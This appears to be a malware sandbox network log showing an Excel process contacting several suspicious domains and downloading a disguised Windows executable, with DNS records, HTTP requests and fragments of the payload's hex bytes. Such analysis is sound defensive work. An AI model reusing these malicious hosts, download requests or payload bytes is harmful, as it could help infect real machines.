Jul 6, 2021 16:14:31.435276031 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.435317039 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.435394049 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.436494112 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.436549902 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.436631918 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.437659025 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.437701941 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.438821077 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.438859940 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.438910961 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.440073967 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.440116882 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.440233946 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.441211939 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.441255093 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.442397118 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.442440987 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.442466974 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.443541050 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.443582058 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.443653107 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.444717884 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.444761038 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.445651054 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.445894003 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.518866062 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.518944979 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.518969059 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.519427061 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.519475937 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.519570112 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.520560980 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.520628929 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.520802975 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.521711111 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.521754980 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.521830082 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.522928953 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.522974014 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.523081064 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.524147034 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.524189949 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.524272919 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.525337934 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.525403023 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.525701046 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.526602983 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.526662111 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.526751995 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.527658939 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.527709007 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.528007030 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.528841019 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.528882027 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.528951883 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.529975891 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.530015945 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.530113935 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.531187057 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.531229973 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.531321049 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.532331944 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.532370090 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.532464027 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.533505917 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.608361006 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.608422041 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.608582973 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.608928919 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.608978987 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.609071970 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.610076904 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.610120058 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.610193968 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.611238956 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.611279964 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.611356020 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.612462044 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.612502098 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.612575054 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.613625050 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.613672018 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.613744020 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.614804029 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.614845991 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.614907980 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.616017103 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.616056919 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.616123915 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.617199898 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.617253065 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.617326021 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.618290901 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.618330956 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.618398905 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.619529009 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.619569063 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.619632006 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.620703936 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.620755911 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.620829105 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.621853113 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.621895075 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.621963024 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.623042107 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.696434021 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.696455002 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.696489096 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.696978092 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.696995020 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.697015047 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.698196888 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.698214054 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.698251009 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.699403048 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.699419975 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.699459076 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.700510025 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.700529099 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.700570107 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.701709986 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.701726913 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.701761961 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.702902079 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.702924967 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.702965021 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.704058886 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.704078913 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.704116106 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.705249071 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.705265045 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.705303907 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.706413031 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.706438065 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.706475973 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.707600117 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.707627058 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.707667112 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.708765984 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.708782911 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.708817959 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.709932089 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.709949017 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.709980011 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.711090088 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.784965038 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.785001040 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.785027027 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.785512924 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.785538912 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.785557032 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.786693096 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.786726952 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.786744118 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.787893057 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.787925005 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.787942886 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.789086103 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.789115906 CEST	443	49168	143.204.91.74	192.168.2.22
Jul 6, 2021 16:14:31.789134026 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:31.991039038 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:32.031311989 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:14:32.069355011 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 16:14:32.069534063 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:14:32.070776939 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:14:32.108760118 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 16:14:32.622010946 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 16:14:32.622035980 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 16:14:32.622307062 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:14:33.948882103 CEST	49168	443	192.168.2.22	143.204.91.74
Jul 6, 2021 16:14:33.949279070 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 16:16:28.503326893 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 16:16:28.503849983 CEST	49166	80	192.168.2.22	104.21.12.122
Jul 6, 2021 16:16:28.504209042 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:16:28.543580055 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 16:16:28.543771029 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 16:16:28.546941996 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 16:16:28.547051907 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 16:16:28.554339886 CEST	80	49166	104.21.12.122	192.168.2.22
Jul 6, 2021 16:16:28.554593086 CEST	49166	80	192.168.2.22	104.21.12.122

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 16:14:28.550389051 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:28.616602898 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 6, 2021 16:14:28.747818947 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:28.809851885 CEST	53	53099	8.8.8.8	192.168.2.22
Jul 6, 2021 16:14:28.976381063 CEST	52838	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:29.042589903 CEST	53	52838	8.8.8.8	192.168.2.22
Jul 6, 2021 16:14:30.058554888 CEST	61200	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:30.117636919 CEST	53	61200	8.8.8.8	192.168.2.22
Jul 6, 2021 16:14:30.139955044 CEST	49548	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:30.203310966 CEST	53	49548	8.8.8.8	192.168.2.22
Jul 6, 2021 16:14:31.887684107 CEST	55627	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:31.957178116 CEST	53	55627	8.8.8.8	192.168.2.22
Jul 6, 2021 16:14:31.971249104 CEST	56009	53	192.168.2.22	8.8.8.8
Jul 6, 2021 16:14:32.028918982 CEST	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 6, 2021 16:14:28.550389051 CEST	192.168.2.22	8.8.8.8	0x73f5	Standard query (0)	thousandsyears.download	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:28.747818947 CEST	192.168.2.22	8.8.8.8	0x8296	Standard query (0)	voopeople.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:28.976381063 CEST	192.168.2.22	8.8.8.8	0x15d4	Standard query (0)	uppercilio.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:30.058554888 CEST	192.168.2.22	8.8.8.8	0x6d9f	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:30.139955044 CEST	192.168.2.22	8.8.8.8	0xa3a3	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:31.887684107 CEST	192.168.2.22	8.8.8.8	0xb187	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:31.971249104 CEST	192.168.2.22	8.8.8.8	0xb163	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 6, 2021 16:14:28.616602898 CEST	8.8.8.8	192.168.2.22	0x73f5	No error (0)	thousandsyears.download		172.67.198.51	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:28.616602898 CEST	8.8.8.8	192.168.2.22	0x73f5	No error (0)	thousandsyears.download		104.21.52.111	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:28.809851885 CEST	8.8.8.8	192.168.2.22	0x8296	No error (0)	voopeople.fun		104.21.12.122	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:28.809851885 CEST	8.8.8.8	192.168.2.22	0x8296	No error (0)	voopeople.fun		172.67.194.117	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:29.042589903 CEST	8.8.8.8	192.168.2.22	0x15d4	No error (0)	uppercilio.fun		172.67.146.88	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:29.042589903 CEST	8.8.8.8	192.168.2.22	0x15d4	No error (0)	uppercilio.fun		104.21.55.83	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:30.117636919 CEST	8.8.8.8	192.168.2.22	0x6d9f	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:14:30.117636919 CEST	8.8.8.8	192.168.2.22	0x6d9f	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:14:30.117636919 CEST	8.8.8.8	192.168.2.22	0x6d9f	No error (0)	dr49lng3n1n2s.cloudfront.net		143.204.91.74	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:30.203310966 CEST	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:14:30.203310966 CEST	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 16:14:30.203310966 CEST	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	dr49lng3n1n2s.cloudfront.net		143.204.91.74	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:31.957178116 CEST	8.8.8.8	192.168.2.22	0xb187	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:31.957178116 CEST	8.8.8.8	192.168.2.22	0xb187	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:32.028918982 CEST	8.8.8.8	192.168.2.22	0xb163	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 16:14:32.028918982 CEST	8.8.8.8	192.168.2.22	0xb163	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

thousandsyears.download

voopeople.fun

uppercilio.fun

astrocycle.download

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	172.67.198.51	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:14:28.669274092 CEST	0	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: thousandsyears.download Connection: Keep-Alive
Jul 6, 2021 16:14:28.724915028 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 14:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1077 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mhEd5Se%2BhgyiORXCWqkxZGeBGMnWZCjJYxESLDt0ps9SqBX%2FPijHvT7oQVJhCsVes9Rgi4N78nXmE4YfiexMNP%2B4g9G80rfFVxBp2H0AIScaCcQmhaOnnxptLJGW0WGFjyK40us%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9708d5db84a9e-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 16:14:28.724936008 CEST	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	104.21.12.122	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 16:14:28.859438896 CEST	2	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: voopeople.fun Connection: Keep-Alive
Jul 6, 2021 16:14:28.914916992 CEST	3	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 14:14:28 GMT Content-Type: application/octet-stream Content-Length: 57856 Connection: keep-alive Content-Disposition: attachment; filename=lsdfik.fml Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 1076 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=GJmmU9sqa2u7Vr22UhNQ37pnXPXaZjQU%2FySRSipuqp7OkgZ0DAGaJ3STsqtkjsrCbkCHYlP%2BdkgBSNs7LdSIavPpAmT5Ze1Gyn32ivAYh8f6UUUKilFOpdKkgg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a9708e89174dc4-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
Jul 6, 2021 16:14:28.914997101 CEST	5	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@
Jul 6, 2021 16:14:28.915050030 CEST	6	IN	Data Raw: 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20 4c 89 c2 41 b8 00 Data Ascii: #ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD$@$
Jul 6, 2021 16:14:28.915153027 CEST	8	IN	Data Raw: 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24 b2 00 00 00 89 84 Data Ascii: HIH$$$H$HI HL$p$$H\|$p$$HL$pHIPHL$h$$HL$pfQHf$$$\|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$hA
